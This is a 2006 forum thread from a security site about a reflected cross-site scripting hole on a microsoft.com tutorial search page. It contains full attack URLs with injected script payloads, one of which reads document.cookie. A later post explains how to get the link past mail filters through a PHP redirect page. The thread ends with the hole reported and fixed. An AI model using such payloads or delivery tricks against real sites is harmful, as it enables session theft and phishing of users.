 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 452
 Members: 0
 Total: 452
|
|
|
|
|
|
Full disclosure |
|
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
xss in microsoft.com |
|
 Posted: Mon Aug 07, 2006 8:33 am |
 |
|
| ToXiC |
| Moderator |
 |
|
| Joined: Dec 01, 2004 |
| Posts: 181 |
| Location: Cyprus |
|
|
 |
|
 |
|
emmm ... for those who will find it handy..nothing more to say or do
example 1:
| Code: | | http://www.microsoft.com/education/Tutorials.mspx?Act=Tutorials.mspx&Xslt=%2Fbusiness%2FXSLT%2FTutorialsResults_0405.xslt&Op1=%3Cscript%3Ealert(document.cookie)%3C/script%3E&Op2=all&Op4=all&SearchSubmit=Search |
example 2:
| Code: |
http://www.microsoft.com/education/Tutorials.mspx?Act=Tutorials.mspx&Xslt=%2Fbusiness%2FXSLT%2FTutorialsResults_0405.xslt&Op1=%3Cscript%3Ealert("Fix your Damn XSS")%3C/script%3E&Op2=all&Op4=all&SearchSubmit=Search |
screenshot:
use it wisely
ToX |
|
_________________
who|grep -i blonde|talk; cd~;wine;talk;touch;unzip;touch; strip;gasp;finger;gasp;mount; fsck; more; yes; gasp; umount; make clean; sleep;wakeup;goto http://www.md5this.com |
|
|
|
|
:) |
|
| Posted: Fri Aug 11, 2006 11:18 am |
|
|
| oxygenne |
| Advanced user |
 |
|
| Joined: Apr 13, 2005 |
| Posts: 52 |
|
|
|
|
|
|
|
| Unless your browser has scripting disabled, you should be returned to the page you were at in a couple seconds. Otherwise, please click here to return manually. |
|
|
|
|
|
Re: :) |
|
| Posted: Fri Aug 18, 2006 9:59 am |
|
|
| ToXiC |
| Moderator |
|
|
| Joined: Dec 01, 2004 |
| Posts: 181 |
| Location: Cyprus |
|
|
|
|
|
|
| oxygenne wrote: | | Unless your browser has scripting disabled, you should be returned to the page you were at in a couple seconds. Otherwise, please click here to return manually. |
 xss still not fixed .. ok .. thats not the main purpose of that to have scripting disable .. i report it to microsoft .. check out the reply
| Quote: | Hello xxxxxx,
Thank you for contacting Microsoft Online Customer Service.
I comprehend from your e-mail that you are providing feedback about a certain Microsoft web site. I understand the importance of the issue and look forward to assisting you.
However, the information you have sent us this time, is not specific enough. Hence please provide the following details for us to get a better understanding of your issue.
-Windows Version(E.g Windows XP Home):
-Application you area facing an issue with:
-Complete text of error message(If any):
-Detailed description of the issue:
I appreciate your patience and look forward to your reply.
Thank you for using Microsoft products and services.
Muktadeer
Microsoft Online Customer Service Representative
If you have any feedback about your Online Customer Service experience, please e-mail my manager, Nikhil Ramachandran, at managers@microsoft.com
|
I dont know what they understand or what they wanted to understand but now i am confused Its not my problem that microsoft site has a vulnerability .. and they tried to present it as my problem ahhaha |
|
_________________
who|grep -i blonde|talk; cd~;wine;talk;touch;unzip;touch; strip;gasp;finger;gasp;mount; fsck; more; yes; gasp; umount; make clean; sleep;wakeup;goto http://www.md5this.com |
|
|
|
|
|
|
|
| Posted: Fri Aug 18, 2006 6:47 pm |
|
|
| oxygenne |
| Advanced user |
|
|
| Joined: Apr 13, 2005 |
| Posts: 52 |
|
|
|
|
|
|
|
Ok the problem was that sending direct of xss site to someones mail is not working but sending simple redirect page is working like a charm:D
<?php
header("Location: http://msn-xss site
exit;
?> |
|
|
|
|
| Posted: Tue Aug 22, 2006 2:17 pm |
|
|
| ToXiC |
| Moderator |
|
|
| Joined: Dec 01, 2004 |
| Posts: 181 |
| Location: Cyprus |
|
|
|
|
|
|
ok microsoft fixed the bug ..
after a week that was quick |
|
_________________
who|grep -i blonde|talk; cd~;wine;talk;touch;unzip;touch; strip;gasp;finger;gasp;mount; fsck; more; yes; gasp; umount; make clean; sleep;wakeup;goto http://www.md5this.com |
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
